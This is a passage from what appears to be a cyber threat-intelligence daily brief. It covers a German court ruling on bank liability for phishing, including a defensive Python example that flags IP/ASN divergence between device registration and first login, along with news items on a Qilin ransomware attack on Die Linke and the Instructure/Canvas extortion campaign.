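The EID 3 (network connection) record is deliberately ignored: only process-creation events have a meaningful parent image, and conflating the two event types is a common source of duplicate alerts. Outbound UDP/443 hunting from the same takeaway is better done on EID 3 or firewall logs and is not covered here.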

German court finds bank liable for sophisticated phishing loss — PSD2/IP-analytics obligations clarified

From CTI Daily Brief — 2026-05-09 · published 2026-05-09 · view item permalink →

On 2026-04-22 the Landgericht Berlin II (Civil Chamber 38, case 38 O 293/25; not yet final pending appeal) ordered Deutsche Apotheker- und Ärztebank (Apobank) to reimburse €218,000+ in losses from a sophisticated phishing attack that combined forged physical bank letters, manipulated online banking interfaces, and spoofed-number phone calls (heise online, 2026-05-08 · ilex Rechtsanwälte — case summary, 2026-05). The court rejected gross-negligence defences, finding the fraud was too sophisticated to attribute to customer failure. Critically, the ruling found the bank's fraud-detection systems failed to act on a clear anomaly visible in bank-side logs: the new device registration and first login originated from materially different IP addresses and ISPs. The court treated this as an obligation under Germany's PSD2 implementation — specifically, a duty to apply IP-based behavioural analytics and trigger a strong-customer-authentication challenge when registration and first-use IPs diverge. For EU/Swiss financial-sector and public-sector digital-service providers: this reinforces the trend of courts placing authentication-failure liability on service providers when fraud signals are present in server-side telemetry but not acted on.
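The bank-side check the court described, as an added Python example that is not code from the ruling, from Apobank or from ctipilot.ch: compare the network origin of a device registration with the first login on that device and require a strong-customer-authentication (SCA) step-up when they diverge. The prefix-to-ASN table is constructed (RFC 5737 documentation ranges with hypothetical ASNs) and stands in for a real IP-intelligence feed; the fail-closed handling of unresolved origins is a design choice, not something the ruling prescribes.

```python
"""Added example (not from the court ruling or any bank's system): registration
versus first-login origin comparison that decides whether to force an SCA
challenge. The ASN table is constructed; a real deployment would use an IP
intelligence feed and richer device telemetry."""
import ipaddress
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Constructed prefix -> ASN mapping using RFC 5737 documentation ranges.
PREFIX_TABLE: List[Tuple[ipaddress.IPv4Network, str]] = [
    (ipaddress.ip_network("203.0.113.0/24"), "AS64500"),   # hypothetical ISP A
    (ipaddress.ip_network("198.51.100.0/24"), "AS64501"),  # hypothetical ISP B
    (ipaddress.ip_network("192.0.2.0/24"), "AS64502"),     # hypothetical ISP C
]


def lookup_asn(ip: str) -> str:
    """Resolve an address to an ASN via the constructed table; 'UNKNOWN' if absent."""
    addr = ipaddress.ip_address(ip)
    for network, asn in PREFIX_TABLE:
        if addr in network:
            return asn
    return "UNKNOWN"


@dataclass(frozen=True)
class OriginEvent:
    device_id: str  # identifier the bank assigned at device registration
    ip: str         # client address seen by the bank at the event
    ts: int         # unix seconds, used only for the audit trail here


def assess_first_login(registration: OriginEvent, login: OriginEvent) -> Dict:
    """Compare registration and first-use origins for the same device.

    Rule: a different ISP (ASN) between registration and first login is the
    anomaly the court pointed at and forces an SCA challenge. Same ASN but a
    different IP (DHCP churn, CGNAT) is logged but allowed. An unresolvable
    origin fails closed and also challenges (design choice, assumed)."""
    if registration.device_id != login.device_id:
        raise ValueError("registration and login must refer to the same device")

    reg_asn, login_asn = lookup_asn(registration.ip), lookup_asn(login.ip)
    reasons: List[str] = []
    if registration.ip != login.ip:
        reasons.append(f"ip_changed:{registration.ip}->{login.ip}")
    if reg_asn != login_asn:
        reasons.append(f"asn_changed:{reg_asn}->{login_asn}")
    if "UNKNOWN" in (reg_asn, login_asn):
        reasons.append("asn_unresolved")

    challenge = any(r.startswith("asn_changed") or r == "asn_unresolved" for r in reasons)
    return {
        "device_id": login.device_id,
        "decision": "sca_challenge" if challenge else "allow",
        "reasons": reasons,
        "audit": {"registration_ts": registration.ts, "login_ts": login.ts},
    }


if __name__ == "__main__":
    reg = OriginEvent("dev-7f3a", "203.0.113.10", 1_777_000_000)
    first = OriginEvent("dev-7f3a", "198.51.100.7", 1_777_003_600)
    print(assess_first_login(reg, first))
```

The point of keeping `reasons` in the result is that the ruling turned on what was visible in the bank's own logs: a decision record that names the divergent IPs and ASNs is what an operator would need to show that the signal was acted on, not merely recorded.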

Qilin ransomware hits Die Linke (Germany): 1.5 TB claimed, DPA notified (~April 2026, first coverage)

From CTI Daily Brief — 2026-05-08 · published 2026-05-08 · view item permalink →

The German federal party Die Linke confirmed in April 2026 that the Qilin ransomware group (also known as Agenda, a Rust-based RaaS platform known for double extortion) encrypted its systems and exfiltrated data, with the gang claiming 1.5 TB of internal data. The party's data protection officer notified the responsible Landesdatenschutzbehörde (state DPA). Die Linke issued a victim statement acknowledging operational disruption; no ransom figure has been publicly disclosed. Qilin has targeted political parties and civil-society organisations across Western Europe since 2023. This breach is approximately four weeks old but has not been previously covered in this brief series.

UPDATE — Instructure/Canvas extortion: 330 institutions across six countries; May 12 extortion deadline; 44 Dutch institutions confirmed

From CTI Daily Brief — 2026-05-08 · published 2026-05-08 · view item permalink →

(First covered 2026-05-06.) The Instructure/Canvas breach has expanded significantly in scope. The threat actor now claims access affecting 330 institutions across six countries, threatening to publish 16 million student and staff records. SURF (the Dutch National Research and Education Network) has confirmed 44 Dutch institutions among the victims. The attacker posted portal defacements at multiple universities and established a 2026-05-12 extortion deadline for ransom payment. Canvas services were taken offline again on 2026-05-07 for emergency patching. European DPAs in the Netherlands and Germany have opened preliminary inquiries into notification timing. Institutions using Canvas should assess GDPR Article 33/34 breach notification obligations before the May 12 deadline.